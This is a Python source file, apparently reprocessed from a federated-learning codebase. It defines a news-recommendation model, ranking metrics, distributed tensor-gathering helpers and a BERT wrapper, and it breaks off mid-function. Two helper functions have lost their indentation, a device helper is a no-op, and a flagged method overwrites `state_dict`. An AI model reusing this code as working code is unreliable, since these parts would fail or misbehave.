        super(Attention, self).__init__(**kwargs)
        self.input_dim = input_dim
        self.nb_head = nb_head
        self.size_per_head = size_per_head
        self.output_dim = nb_head * size_per_head
        self.WQ = nn.Linear(self.input_dim, self.output_dim, bias=False)
        self.WK = nn.Linear(self.input_dim, self.output_dim, bias=False)
        self.WV = nn.Linear(self.input_dim, self.output_dim, bias=False)
        torch.nn.init.xavier_uniform_(self.WQ.weight, gain=np.sqrt(2))
        torch.nn.init.xavier_uniform_(self.WK.weight, gain=np.sqrt(2))
        torch.nn.init.xavier_uniform_(self.WV.weight, gain=np.sqrt(2))

    def fromTensorFlow(self, tf, criteria=lambda l: l.name.startswith('attention')):
        """Copy Q/K/V kernels from matching Keras attention layers.

        Stray bare ``None`` statements (stripped debug prints) were
        removed; logic is unchanged.
        """
        for l in tf.layers:
            if criteria(l):
                weights = l.get_weights()
                self.WQ.weight.data = torch.tensor(weights[0].transpose())
                self.WK.weight.data = torch.tensor(weights[1].transpose())
                self.WV.weight.data = torch.tensor(weights[2].transpose())

    def forward(self, x):
        """Expects ``x`` to be a 3-sequence ``[Q_seq, K_seq, V_seq]``.

        NOTE(review): any other length leaves Q_seq undefined and raises
        NameError, as in the original; callers always pass three tensors.
        (The unused Q_len/V_len locals were removed.)
        """
        if len(x) == 3:
            Q_seq, K_seq, V_seq = x
        # Project and split into heads: (B, heads, seq, size_per_head).
        Q_seq = self.WQ(Q_seq)
        Q_seq = torch.reshape(Q_seq, (-1, Q_seq.shape[1], self.nb_head, self.size_per_head))
        Q_seq = torch.transpose(Q_seq, 1, 2)
        K_seq = self.WK(K_seq)
        K_seq = torch.reshape(K_seq, (-1, K_seq.shape[1], self.nb_head, self.size_per_head))
        K_seq = torch.transpose(K_seq, 1, 2)
        V_seq = self.WV(V_seq)
        V_seq = torch.reshape(V_seq, (-1, V_seq.shape[1], self.nb_head, self.size_per_head))
        V_seq = torch.transpose(V_seq, 1, 2)
        # Scaled dot-product attention, per head.
        A = torch.einsum('ijkl,ijml->ijkm', Q_seq, K_seq) / self.size_per_head ** 0.5
        A = torch.softmax(A, dim=-1)
        O_seq = torch.einsum('ijkl,ijlm->ijkm', A, V_seq)
        # Merge heads back: (B, seq, output_dim).
        O_seq = torch.transpose(O_seq, 1, 2)
        O_seq = torch.reshape(O_seq, (-1, O_seq.shape[1], self.output_dim))
        return O_seq
class Permute(nn.Module):
    """Permute tensor dimensions by a fixed order (Keras-style layer)."""

    def __init__(self, *dims):
        super(Permute, self).__init__()
        self.dims = dims

    def forward(self, x):
        order = self.dims
        return x.permute(*order)
class SwapTrailingAxes(nn.Module):
    """Swap the last two axes, e.g. (B, T, C) -> (B, C, T)."""

    def __init__(self):
        super(SwapTrailingAxes, self).__init__()

    def forward(self, x):
        return x.transpose(-2, -1)
class DocEncoder(nn.Module):
    """News-title encoder: CNN -> self-attention -> attentive pooling."""

    def __init__(self):
        super(DocEncoder, self).__init__()
        self.phase1 = nn.Sequential(nn.Dropout(0.2), SwapTrailingAxes(), nn.Conv1d(300, 400, 3), nn.ReLU(), nn.Dropout(0.2), SwapTrailingAxes())
        self.attention = Attention(400, 20, 20)
        self.phase2 = nn.Sequential(nn.ReLU(), nn.Dropout(0.2), AttentivePooling(30, 400))

    def fromTensorFlow(self, tfDoc):
        """Copy conv / attention / pooling weights from the Keras encoder.

        Stray bare ``None`` statements (stripped debug prints) were
        removed; logic is unchanged.
        """
        # Copy the first conv layer's kernel/bias from the first Keras conv.
        for l in self.phase1:
            if 'conv' in l._get_name().lower():
                for lt in tfDoc.layers:
                    if 'conv' in lt.name.lower():
                        weights = lt.get_weights()
                        l.weight.data = torch.tensor(weights[0]).transpose(0, 2)
                        l.bias.data = torch.tensor(weights[1])
                        break
                break
        self.attention.fromTensorFlow(tfDoc)
        # Copy the attentive-pooling sub-model weights.
        for l in self.phase2:
            if 'attentive' in l._get_name().lower():
                for lt in tfDoc.layers:
                    if 'model' in lt.name.lower():
                        l.fromTensorFlow(lt)

    def forward(self, x):
        feats = self.phase1(x)
        # Self-attention: query, key and value are all the CNN features.
        attended = self.attention([feats] * 3)
        return self.phase2(attended)
class VecTail(nn.Module):
    """Keep only the last ``n`` entries along the sequence (dim 1) axis."""

    def __init__(self, n):
        super(VecTail, self).__init__()
        self.n = n

    def forward(self, x):
        tail = x[:, -self.n:, :]
        return tail
class UserEncoder(nn.Module):
    """Build a user vector from encoded click-history news vectors.

    Combines (a) attentive pooling over self-attended history vectors
    and (b) the last GRU state over the 20 most recent clicks, then
    fuses the two candidate user vectors with a final attentive pooling.
    """

    def __init__(self):
        super(UserEncoder, self).__init__()
        self.attention2 = Attention(400, 20, 20)
        self.dropout2 = nn.Dropout(0.2)
        self.pool2 = AttentivePooling(50, 400)
        self.tail2 = VecTail(20)
        self.gru2 = nn.GRU(400, 400, bidirectional=False, batch_first=True)
        self.pool3 = AttentivePooling(2, 400)

    def forward(self, news_vecs_input):
        # View 1: self-attention over the full history + attentive pooling.
        user_vecs2 = self.attention2([news_vecs_input] * 3)
        user_vecs2 = self.dropout2(user_vecs2)
        user_vec2 = self.pool2(user_vecs2)
        # View 2: GRU over the 20 most recent clicks; take the last state.
        user_vecs1 = self.tail2(news_vecs_input)
        self.gru2.flatten_parameters()
        user_vec1, _ = self.gru2(user_vecs1)
        user_vec1 = user_vec1[:, -1, :]
        # Fuse both views with attentive pooling.
        user_vecs = torch.stack([user_vec1, user_vec2], dim=1)
        return self.pool3(user_vecs)

    def fromTensorFlow(self, tfU):
        """Copy pooling / GRU / attention weights from the Keras model.

        Stray bare ``None`` statements (stripped prints) and an unused
        shape local were removed; logic is unchanged.
        """
        for l in tfU.layers:
            if l.name == 'model_1':
                self.pool2.fromTensorFlow(l)
            elif l.name == 'model_2':
                self.pool3.fromTensorFlow(l)
            elif l.name == 'gru_1':
                weights = l.get_weights()
                for name, param in self.gru2.named_parameters():
                    if name == 'weight_ih_l0':
                        param.data = torch.tensor(weights[0]).transpose(0, 1).contiguous()
                    elif name == 'weight_hh_l0':
                        param.data = torch.tensor(weights[1]).transpose(0, 1).contiguous()
                    elif name == 'bias_ih_l0':
                        param.data = torch.tensor(weights[2])
                    elif name == 'bias_hh_l0':
                        # Keras GRUs carry one bias; zero torch's second bias.
                        param.data = torch.zeros(param.data.shape)
        self.attention2.fromTensorFlow(tfU)
class TimeDistributed(nn.Module):
    """Apply ``module`` independently to every slice along dim 1.

    Mirrors Keras' TimeDistributed: a 4-D input ``(B, T, ...)`` is
    processed one timestep at a time and the results are re-stacked on
    dim 1. Inputs with <= 2 dims are passed through directly.
    """

    def __init__(self, module):
        super(TimeDistributed, self).__init__()
        self.module = module

    def forward(self, x):
        if x.dim() <= 2:
            return self.module(x)
        # Collect per-timestep outputs and concatenate once: the original
        # re-allocated the accumulator with torch.cat on every iteration
        # (quadratic in T) starting from an empty 1-D tensor.
        outputs = [self.module(x[:, i, :, :]).unsqueeze(1) for i in range(x.size(1))]
        if not outputs:
            # Preserve the original's empty-tensor result for T == 0.
            return torch.tensor([])
        return torch.cat(outputs, dim=1)
class FedNewsRec(nn.Module):
    """News-recommendation model: shared doc encoder + user encoder.

    Scores candidate news titles against a user vector built from the
    click history; word embeddings are frozen pretrained vectors.
    """

    def __init__(self, title_word_embedding_matrix):
        super(FedNewsRec, self).__init__()
        self.doc_encoder = DocEncoder()
        self.user_encoder = UserEncoder()
        # Frozen pretrained word embeddings for news titles.
        self.title_word_embedding_layer = nn.Embedding.from_pretrained(torch.tensor(title_word_embedding_matrix, dtype=torch.float), freeze=True)
        self.softmax = nn.Softmax(dim=1)
        # Both TimeDistributed wrappers share the same doc-encoder weights.
        self.click_td = TimeDistributed(self.doc_encoder)
        self.can_td = TimeDistributed(self.doc_encoder)

    def forward(self, click_title, can_title):
        # Encode every clicked and candidate title with the shared encoder.
        click_word_vecs = self.title_word_embedding_layer(click_title)
        can_word_vecs = self.title_word_embedding_layer(can_title)
        click_vecs = self.click_td(click_word_vecs)
        can_vecs = self.can_td(can_word_vecs)
        user_vec = self.user_encoder(click_vecs)
        # Dot-product score between each candidate and the user vector.
        scores = torch.einsum('ijk,ik->ij', can_vecs, user_vec)
        logits = scores
        return logits, user_vec

    def news_encoder(self, news_title):
        """Encode a batch of raw title token ids into news vectors."""
        news_word_vecs = self.title_word_embedding_layer(news_title)
        news_vec = self.doc_encoder(news_word_vecs)
        return news_vec
def mrr_score(y_true, y_score):
    """Mean reciprocal rank of the positives in ``y_true`` under the ranking
    induced by ``y_score`` (highest score first)."""
    ranking = np.argsort(y_score)[::-1]
    relevance = np.take(y_true, ranking)
    reciprocal = relevance / (np.arange(len(relevance)) + 1)
    return np.sum(reciprocal) / np.sum(relevance)
def dcg_score(y_true, y_score, k=10):
    """Discounted cumulative gain of the top-``k`` items ranked by ``y_score``."""
    top_k = np.argsort(y_score)[::-1][:k]
    gains = 2 ** np.take(y_true, top_k) - 1
    discounts = np.log2(np.arange(len(top_k)) + 2)
    return np.sum(gains / discounts)
def ndcg_score(y_true, y_score, k=10):
    """DCG of the ``y_score`` ranking normalized by the ideal (best possible) DCG."""
    ideal = dcg_score(y_true, y_true, k)
    achieved = dcg_score(y_true, y_score, k)
    return achieved / ideal
class FEDNEWS(BaseModel):
    """This is a PyTorch model with some extra methods"""

    def __init__(self, model_config):
        # Builds vocab/index dicts from the news TSVs and a GloVe embedding
        # matrix, then instantiates the FedNewsRec network.
        # NOTE(review): both paths read the same (misspelled) config key
        # 'embbeding_path' — kept as-is because existing configs use that spelling.
        super().__init__()
        root_data_path = model_config['embbeding_path']
        embedding_path = model_config['embbeding_path']
        news, news_index, category_dict, subcategory_dict, word_dict = self.read_news(root_data_path, ['train', 'val'])
        title_word_embedding_matrix, _ = self.load_matrix(embedding_path, word_dict)
        self.net = FedNewsRec(title_word_embedding_matrix)

    def loss(self, input: torch.Tensor) ->torch.Tensor:
        """Performs forward step and computes the loss"""
        # Returns a zero loss when the net is in eval mode.
        if not self.net.training:
            return torch.tensor(0)
        # NOTE(review): `device` is computed but never used, and the
        # `click = click` assignments are leftovers of stripped `.to(device)`
        # transfers from the extraction process.
        device = 'cuda' if torch.cuda.is_available() else 'cpu'
        (click, sample), label = input['x'], input['y']
        click = click
        sample = sample
        label = label
        criterion = CrossEntropyLoss()
        output, _ = self.net.forward(click, sample)
        return criterion(output, label)

    def inference(self, input):
        """Performs forward step and computes metrics"""
        # Scores a single impression: encodes candidate news and the click
        # history, then ranks candidates by dot product with the user vector.
        device = 'cuda' if torch.cuda.is_available() else 'cpu'
        (nv_hist, nv_imp), labels = input['x'], input['y']
        nv_hist = nv_hist
        nv_imp = nv_imp
        nv = self.net.news_encoder(nv_imp).detach().cpu().numpy()
        nv_hist = self.net.news_encoder(nv_hist)
        uv = self.net.user_encoder(nv_hist.unsqueeze(0)).detach().cpu().numpy()[0]
        score = np.dot(nv, uv)
        auc = roc_auc_score(labels, score)
        mrr = mrr_score(labels, score)
        acc = ndcg_score(labels, score, k=1)
        ndcg5 = ndcg_score(labels, score, k=5)
        ndcg10 = ndcg_score(labels, score, k=10)
        # batch_size is 1 because inference handles one impression at a time.
        return {'output': None, 'acc': acc, 'batch_size': 1, 'auc': {'value': auc, 'higher_is_better': True}, 'mrr': {'value': mrr, 'higher_is_better': True}, 'ndcg5': {'value': ndcg5, 'higher_is_better': True}, 'ndcg10': {'value': ndcg10, 'higher_is_better': True}}

    def read_news(self, root_data_path, modes):
        # Parses `news.tsv` under each mode directory (tab-separated:
        # id, category, subcategory, title, ...) and builds index/vocab dicts.
        # Returns (news, news_index, category_dict, subcategory_dict, word_dict);
        # every index starts at 1 — 0 is implicitly left for padding.
        news = {}
        category = []
        subcategory = []
        news_index = {}
        index = 1
        word_dict = {}
        word_index = 1
        for mode in modes:
            with open(os.path.join(root_data_path, mode, 'news.tsv'), encoding='utf8') as f:
                lines = f.readlines()
                for line in lines:
                    splited = line.strip('\n').split('\t')
                    doc_id, vert, subvert, title = splited[0:4]
                    if doc_id in news_index:
                        continue
                    news_index[doc_id] = index
                    index += 1
                    category.append(vert)
                    subcategory.append(subvert)
                    title = title.lower()
                    title = word_tokenize(title)
                    news[doc_id] = [vert, subvert, title]
                    for word in title:
                        word = word.lower()
                        if not word in word_dict:
                            word_dict[word] = word_index
                            word_index += 1
        category = list(set(category))
        subcategory = list(set(subcategory))
        category_dict = {}
        index = 1
        for c in category:
            category_dict[c] = index
            index += 1
        subcategory_dict = {}
        index = 1
        for c in subcategory:
            subcategory_dict[c] = index
            index += 1
        return news, news_index, category_dict, subcategory_dict, word_dict

    def load_matrix(self, embedding_path, word_dict):
        # Loads GloVe 840B 300-d vectors for words present in `word_dict`.
        # Row 0 stays zero (padding); rows for words missing from the GloVe
        # file also stay zero. Returns the matrix and the list of found words.
        embedding_matrix = np.zeros((len(word_dict) + 1, 300))
        have_word = []
        with open(os.path.join(embedding_path, 'glove.840B.300d.txt'), 'rb') as f:
            while True:
                l = f.readline()
                if len(l) == 0:
                    break
                l = l.split()
                word = l[0].decode()
                if word in word_dict:
                    index = word_dict[word]
                    tp = [float(x) for x in l[1:]]
                    embedding_matrix[index] = np.array(tp)
                    have_word.append(word)
        return embedding_matrix, have_word
class EvalPrediction(NamedTuple):
    """
    Evaluation output (always contains labels), to be used to compute metrics.
    Parameters:
        predictions (:obj:`np.ndarray`): Predictions of the model.
        label_ids (:obj:`np.ndarray`): Targets to be matched.
    """
    # NOTE(review): despite the ndarray annotations, ComputeMetrics below calls
    # `.size()` / `.eq()` / `.cpu()` on these fields, so in practice they hold
    # torch tensors — confirm with callers.
    predictions: Union[np.ndarray, Tuple[np.ndarray]]
    label_ids: np.ndarray
def print_rank(str, loglevel=logging.INFO):
    """Log the given message prefixed with the current wall-clock time.

    Note: the parameter is named ``str`` (shadowing the builtin) to preserve
    the original call signature; a fresh local avoids reassigning over it.
    """
    message = '{} : {}'.format(time.ctime(), str)
    logging.log(loglevel, message)
class ComputeMetrics:
    """Computes token-level accuracy from an :class:`EvalPrediction`,
    optionally restricted to positions where ``mask == 1``."""

    def __init__(self, p: EvalPrediction, mask=None):
        # Bug fix: the original stored the EvalPrediction CLASS object and
        # passed it (not `p`) to compute_metrics, ignoring `mask` entirely.
        self.EvalPrediction = p
        self.metrics = self.compute_metrics(p, mask)

    @staticmethod
    def compute_metrics(p: EvalPrediction, mask=None):
        """Return {'acc': tensor} — argmax accuracy over the prediction tensor.

        Expects 3-D predictions (batch, seq, vocab); degrades gracefully for
        lower ranks (2-D uses axis=1; <2-D returns zero accuracy).
        """
        print_rank('Prediction Block Size: {}'.format(p.predictions.size()), loglevel=logging.DEBUG)
        dims = len(list(p.predictions.size()))
        if dims < 3:
            if dims < 2:
                # Bug fix: both messages below had a '{}' missing, so .format()
                # silently dropped the tensor size from the log line.
                print_rank('There is something REALLY wrong with prediction tensor: {}'.format(p.predictions.size()), loglevel=logging.INFO)
                return {'acc': torch.tensor(0.0)}
            print_rank('There is something wrong with prediction tensor: {}'.format(p.predictions.size()), loglevel=logging.INFO)
            preds = np.argmax(p.predictions, axis=1)
        else:
            preds = np.argmax(p.predictions, axis=2)
        if mask is None:
            return {'acc': (preds == p.label_ids).float().mean()}
        else:
            # Only count positions the attention mask marks as real tokens.
            valid = mask == 1
            return {'acc': (preds.eq(p.label_ids.cpu()) * valid.cpu()).float().mean()}
def _get_first_shape(arrays):
"""Return the shape of the first array found in the nested struct `arrays`."""
if isinstance(arrays, (list, tuple)):
return _get_first_shape(arrays[0])
return arrays.shape
def nested_expand_like(arrays, new_seq_length, padding_index=-100):
    """ Expand the `arrays` so that the second dimension grows to `new_seq_length`. Uses `padding_index` for padding."""
    if isinstance(arrays, (list, tuple)):
        expanded = (nested_expand_like(x, new_seq_length, padding_index=padding_index) for x in arrays)
        return type(arrays)(expanded)
    padded_shape = (arrays.shape[0], new_seq_length) + arrays.shape[2:]
    padded = np.full_like(arrays, padding_index, shape=padded_shape)
    padded[:, :arrays.shape[1]] = arrays
    return padded
def nested_new_like(arrays, num_samples, padding_index=-100):
    """ Create the same nested structure as `arrays` with a first dimension always at `num_samples`."""
    if isinstance(arrays, (list, tuple)):
        # Bug fix: propagate `padding_index` into the recursion — it was
        # silently dropped, so nested arrays always used the default -100.
        return type(arrays)(nested_new_like(x, num_samples, padding_index=padding_index) for x in arrays)
    return np.full_like(arrays, padding_index, shape=(num_samples, *arrays.shape[1:]))
def nested_truncate(tensors, limit):
"""Truncate `tensors` at `limit` (even if it's a nested list/tuple of tensors)."""
if isinstance(tensors, (list, tuple)):
return type(tensors)(nested_truncate(t, limit) for t in tensors)
return tensors[:limit]
class DistributedTensorGatherer:
    """
    A class responsible for properly gathering tensors (or nested list/tuple of tensors) on the CPU by chunks.
    If our dataset has 16 samples with a batch size of 2 on 3 processes and we gather then transfer on CPU at every
    step, our sampler will generate the following indices:
    :obj:`[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 0, 1]`
    to get something of size a multiple of 3 (so that each process gets the same dataset length). Then process 0, 1 and
    2 will be responsible of making predictions for the following samples:
    - P0: :obj:`[0, 1, 2, 3, 4, 5]`
    - P1: :obj:`[6, 7, 8, 9, 10, 11]`
    - P2: :obj:`[12, 13, 14, 15, 0, 1]`
    The first batch treated on each process will be
    - P0: :obj:`[0, 1]`
    - P1: :obj:`[6, 7]`
    - P2: :obj:`[12, 13]`
    So if we gather at the end of the first batch, we will get a tensor (nested list/tuple of tensor) corresponding to
    the following indices:
    :obj:`[0, 1, 6, 7, 12, 13]`
    If we directly concatenate our results without taking any precautions, the user will then get the predictions for
    the indices in this order at the end of the prediction loop:
    :obj:`[0, 1, 6, 7, 12, 13, 2, 3, 8, 9, 14, 15, 4, 5, 10, 11, 0, 1]`
    For some reason, that's not going to roll their boat. This class is there to solve that problem.
    Args:
        world_size (:obj:`int`):
            The number of processes used in the distributed training.
        num_samples (:obj:`int`):
            The number of samples in our dataset.
        make_multiple_of (:obj:`int`, `optional`):
            If passed, the class assumes the datasets passed to each process are made to be a multiple of this argument
            (by adding samples).
        padding_index (:obj:`int`, `optional`, defaults to -100):
            The padding index to use if the arrays don't all have the same sequence length.
    """

    def __init__(self, world_size, num_samples, make_multiple_of=None, padding_index=-100):
        self.world_size = world_size
        self.num_samples = num_samples
        # Round the sample count up so every process owns an equal-sized slice.
        total_size = world_size if make_multiple_of is None else world_size * make_multiple_of
        self.total_samples = int(np.ceil(num_samples / total_size)) * total_size
        self.process_length = self.total_samples // world_size
        self._storage = None  # lazily allocated on the first add_arrays() call
        self._offsets = None  # per-process write cursor into _storage
        self.padding_index = padding_index

    def add_arrays(self, arrays):
        """
        Add :obj:`arrays` to the internal storage, Will initialize the storage to the full size at the first arrays
        passed so that if we're bound to get an OOM, it happens at the beginning.
        """
        if arrays is None:
            return
        if self._storage is None:
            # First call: allocate the full padded storage and set each
            # process's starting offset.
            self._storage = nested_new_like(arrays, self.total_samples, padding_index=self.padding_index)
            self._offsets = list(range(0, self.total_samples, self.process_length))
        else:
            # If the incoming arrays have a longer second (sequence) dimension,
            # grow the storage to match before writing.
            storage_shape = _get_first_shape(self._storage)
            arrays_shape = _get_first_shape(arrays)
            if len(storage_shape) > 1 and storage_shape[1] < arrays_shape[1]:
                self._storage = nested_expand_like(self._storage, arrays_shape[1], padding_index=self.padding_index)
        slice_len = self._nested_set_tensors(self._storage, arrays)
        for i in range(self.world_size):
            self._offsets[i] += slice_len

    def _nested_set_tensors(self, storage, arrays):
        # Writes each process's chunk of `arrays` at that process's current
        # offset and returns the per-process slice length.
        # NOTE(review): `slice_len` would be unbound if `arrays` were an empty
        # list/tuple — assumed never to happen; confirm with callers.
        if isinstance(arrays, (list, tuple)):
            for x, y in zip(storage, arrays):
                slice_len = self._nested_set_tensors(x, y)
            return slice_len
        assert arrays.shape[0] % self.world_size == 0, f'Arrays passed should all have a first dimension multiple of {self.world_size}, found {arrays.shape[0]}.'
        slice_len = arrays.shape[0] // self.world_size
        for i in range(self.world_size):
            if len(arrays.shape) == 1:
                storage[self._offsets[i]:self._offsets[i] + slice_len] = arrays[i * slice_len:(i + 1) * slice_len]
            else:
                # Write into the leading columns; the rest stays padding.
                storage[self._offsets[i]:self._offsets[i] + slice_len, :arrays.shape[1]] = arrays[i * slice_len:(i + 1) * slice_len]
        return slice_len

    def finalize(self):
        """
        Return the properly gathered arrays and truncate to the number of samples (since the sampler added some extras
        to get each process a dataset of the same length).
        """
        if self._storage is None:
            return
        if self._offsets[0] != self.process_length:
            # `logger` comes from elsewhere in this file; `warn` is the
            # deprecated alias of `warning` if it is a stdlib logger.
            logger.warn('Not all data has been set. Are you sure you passed all values?')
        return nested_truncate(self._storage, self.num_samples)
def numpy_pad_and_concatenate(array1, array2, padding_index=-100):
    """Concatenates `array1` and `array2` on first axis, applying padding on the second if necessary."""
    if len(array1.shape) == 1 or array1.shape[1] == array2.shape[1]:
        # Bug fix: np.concatenate takes `axis`, not `dim` (a torch-ism) — the
        # original raised TypeError whenever this fast path was reached.
        return np.concatenate((array1, array2), axis=0)
    # Widths differ: allocate a padded result and copy both arrays in.
    new_shape = (array1.shape[0] + array2.shape[0], max(array1.shape[1], array2.shape[1])) + array1.shape[2:]
    result = np.full_like(array1, padding_index, shape=new_shape)
    result[:array1.shape[0], :array1.shape[1]] = array1
    result[array1.shape[0]:, :array2.shape[1]] = array2
    return result
def torch_pad_and_concatenate(tensor1, tensor2, padding_index=-100):
    """Concatenates `tensor1` and `tensor2` on first axis, applying padding on the second if necessary."""
    same_width = len(tensor1.shape) == 1 or tensor1.shape[1] == tensor2.shape[1]
    if same_width:
        return torch.cat((tensor1, tensor2), dim=0)
    # Widths differ: allocate a padded tensor and copy both inputs into it.
    rows = tensor1.shape[0] + tensor2.shape[0]
    cols = max(tensor1.shape[1], tensor2.shape[1])
    merged = tensor1.new_full((rows, cols) + tensor1.shape[2:], padding_index)
    merged[:tensor1.shape[0], :tensor1.shape[1]] = tensor1
    merged[tensor1.shape[0]:, :tensor2.shape[1]] = tensor2
    return merged
def nested_concat(tensors, new_tensors, padding_index=-100):
    """
    Concat the `new_tensors` to `tensors` on the first dim and pad them on the second if needed. Works for tensors or
    nested list/tuples of tensors.
    """
    assert type(tensors) == type(new_tensors), f'Expected `tensors` and `new_tensors` to have the same type but found {type(tensors)} and {type(new_tensors)}.'
    # Dispatch on container type first, then on concrete array type.
    if isinstance(tensors, (list, tuple)):
        pairs = zip(tensors, new_tensors)
        return type(tensors)(nested_concat(t, n, padding_index=padding_index) for t, n in pairs)
    if isinstance(tensors, torch.Tensor):
        return torch_pad_and_concatenate(tensors, new_tensors, padding_index=padding_index)
    if isinstance(tensors, np.ndarray):
        return numpy_pad_and_concatenate(tensors, new_tensors, padding_index=padding_index)
    raise TypeError(f'Unsupported type for concatenation: got {type(tensors)}')
def nested_detach(tensors):
    """Detach `tensors` (even if it's a nested list/tuple of tensors)."""
    if not isinstance(tensors, (list, tuple)):
        return tensors.detach()
    return type(tensors)(nested_detach(t) for t in tensors)
def nested_numpify(tensors):
    """Numpify `tensors` (even if it's a nested list/tuple of tensors)."""
    if not isinstance(tensors, (list, tuple)):
        return tensors.cpu().numpy()
    return type(tensors)(nested_numpify(t) for t in tensors)
def set_seed(seed: int):
    """Seed every RNG the training stack relies on — ``random``, ``numpy``,
    and torch (CPU and all CUDA devices) — for reproducible behavior.

    Args:
        seed (:obj:`int`): The seed to set.
    """
    for seeder in (random.seed, np.random.seed, torch.manual_seed, torch.cuda.manual_seed_all):
        seeder(seed)
def to_device(x):
    """Device-placement shim: in this stripped-down build the input is
    returned unchanged whether or not CUDA is available (the actual
    ``.cuda()`` transfer was removed by the benchmark extraction)."""
    if torch.cuda.is_available():
        return x
    return x
class BERT(BaseModel):
    # Wraps a HuggingFace masked-LM (BERT/RoBERTa family) behind the FLUTE
    # BaseModel interface, reimplementing HF-Trainer-style loss and
    # prediction-loop plumbing for federated evaluation.
    def __init__(self, model_config, **kwargs):
        super(BERT, self).__init__()
        """
        from transformers import RobertaConfig
        config = RobertaConfig(
            vocab_size=52_000,
            max_position_embeddings=514,
            num_attention_heads=12,
            num_hidden_layers=6,
            type_vocab_size=1,
        )
        from transformers import RobertaTokenizerFast
        tokenizer = RobertaTokenizerFast.from_pretrained("./EsperBERTo", max_len=512)
        from transformers import RobertaForMaskedLM
        model = RobertaForMaskedLM(config=config)
        """
        # Pull the model/training sub-configs and seed all RNGs up front.
        args = model_config['BERT']
        model_args, training_args = args['model'], args['training']
        set_seed(training_args['seed'])
        self.gradient_accumulation_steps = model_args.get('gradient_accumulation_steps', 1)
        self.past_index = model_args.get('past_index', -1)  # -1 disables mems/past handling
        self.prediction_loss_only = model_args.get('prediction_loss_only', True)
        self.eval_accumulation_steps = model_args.get('eval_accumulation_steps', None)
        self.label_names = model_args.get('label_names', None)
        self.batch_size = training_args['batch_size']
        self.model_name = model_args['model_name']
        if 'model_name_or_path' not in model_args:
            model_args['model_name_or_path'] = self.model_name
        if training_args['label_smoothing_factor'] != 0:
            self.label_smoother = LabelSmoother(epsilon=training_args['label_smoothing_factor'])
        else:
            self.label_smoother = None
        self.label_names = ['labels'] if self.label_names is None else self.label_names
        # Load config, tokenizer and pretrained weights; each falls back from
        # an explicit name to `model_name_or_path` and otherwise refuses to
        # train from scratch.
        config_kwargs = {'cache_dir': model_args['cache_dir'], 'revision': None, 'use_auth_token': None}
        if 'config_name' in model_args:
            config = AutoConfig.from_pretrained(model_args['config_name'], **config_kwargs)
        elif 'model_name_or_path' in model_args:
            config = AutoConfig.from_pretrained(model_args['model_name_or_path'], **config_kwargs)
        else:
            raise ValueError('You are instantiating a new configuration from scratch. This is not supported by this script.')
        tokenizer_kwargs = {'cache_dir': model_args['cache_dir'], 'use_fast': model_args['use_fast_tokenizer'], 'use_auth_token': None}
        if 'tokenizer_name' in model_args:
            tokenizer = AutoTokenizer.from_pretrained(model_args['tokenizer_name'], **tokenizer_kwargs)
        elif 'model_name_or_path' in model_args:
            None  # placeholder left by the benchmark extractor (stripped logging)
            tokenizer = AutoTokenizer.from_pretrained(model_args['model_name_or_path'], **tokenizer_kwargs)
        else:
            raise ValueError('You are instantiating a new tokenizer from scratch. This is not supported by this script.')
        self.output_layer_size = len(tokenizer)
        if 'model_name_or_path' in model_args:
            None  # extractor placeholder
            self.model = AutoModelForMaskedLM.from_pretrained(model_args['model_name_or_path'], from_tf=False, config=config, cache_dir=model_args['cache_dir'], use_auth_token=None)
            if 'adapter' in model_args:
                if model_args['adapter']:
                    # Adapter mode: only adapter weights train, base stays frozen.
                    self.model.add_adapter('FLUTE')
                    self.model.train_adapter('FLUTE')
        else:
            raise ValueError('You are instantiating a new model from scratch. This is not supported by this script.')
        # Match the output layer to the tokenizer's vocabulary size.
        self.model.resize_token_embeddings(self.output_layer_size)
        # Report total vs. trainable parameter counts (trainable may be just
        # the adapters).
        total_params = 0
        trainable_params = 0
        for p in self.model.parameters():
            total_params += p.numel()
            if p.requires_grad:
                trainable_params += p.numel()
        print_rank(f'Total parameters count: {total_params}', loglevel=logging.DEBUG)
        print_rank(f'Trainable parameters count: {trainable_params}', loglevel=logging.DEBUG)
        print_rank(f'Original Bert parameters count: {total_params - trainable_params}', loglevel=logging.DEBUG)

    def copy_state_dict(self, state_dict):
        # NOTE(review): this assigns over the bound `state_dict` METHOD rather
        # than loading weights (cf. `load_state_dict`); looks like a bug —
        # confirm intended behavior with callers before relying on it.
        self.model.state_dict = state_dict.clone()

    def get_model(self):
        # Accessor for the wrapped HuggingFace model.
        return self.model

    def _prepare_inputs(self, inputs):
        """
        Prepare :obj:`inputs` before feeding them to the model, converting them to tensors if they are not already and
        handling potential state.
        """
        for k, v in inputs.items():
            if isinstance(v, T.Tensor):
                inputs[k] = to_device(v)
        if self.past_index >= 0 and self._past is not None:
            # Carry the cached mems/past state into the next forward pass.
            inputs['mems'] = self._past
        return inputs

    def forward(self, inputs):
        # Thin wrapper: move tensors to the device and unpack into the model.
        inputs = self._prepare_inputs(inputs)
        return self.model(**inputs)

    def loss(self, inputs):
        """
        Perform a training step on a batch of inputs.
        Subclass and override to inject custom behavior.
        Args:
            model (:obj:`nn.Module`):
                The model to train.
            inputs (:obj:`Dict[str, Union[T.Tensor, Any]]`):
                The inputs and targets of the model.
                The dictionary will be unpacked before being fed to the model. Most models expect the targets under the
                argument :obj:`labels`. Check your model's documentation for all accepted arguments.
        Return:
            :obj:`T.Tensor`: The tensor with training loss on this batch.
        """
        inputs = self._prepare_inputs(inputs)
        loss = self.compute_loss(inputs)
        # Scale so accumulated gradients average correctly over the steps.
        loss = loss / self.gradient_accumulation_steps
        return loss

    def compute_loss(self, inputs_orig, return_outputs=False):
        """
        How the loss is computed by Trainer. By default, all models return the loss in the first element.
        Subclass and override for custom behavior.
        inputs (:obj:`Dict[str, Union[T.Tensor, Any]]`):
            The inputs and targets of the model.
            The dictionary will be unpacked before being fed to the model. Most models expect the targets under the
            argument :obj:`labels`. Check your model's documentation for all accepted arguments.
        """
        # Deep-copy so the key pops below don't mutate the caller's batch.
        inputs = copy.deepcopy(inputs_orig)
        if self.label_smoother is not None and 'labels' in inputs:
            labels = inputs['labels'].detach().cpu()
        else:
            labels = None
        if 'roberta' in self.model_name:
            # RoBERTa path drops these mask keys before the forward pass —
            # presumably the collator adds keys this forward doesn't accept;
            # confirm.
            if 'attention_mask' in inputs:
                inputs.pop('attention_mask')
            if 'special_tokens_mask' in inputs:
                inputs.pop('special_tokens_mask')
        outputs = self.model(**inputs)
        if self.past_index >= 0:
            # Cache the model's past/mems state for the next step.
            self._past = outputs[self.past_index]
        if labels is not None:
            loss = self.label_smoother(outputs, labels)
        else:
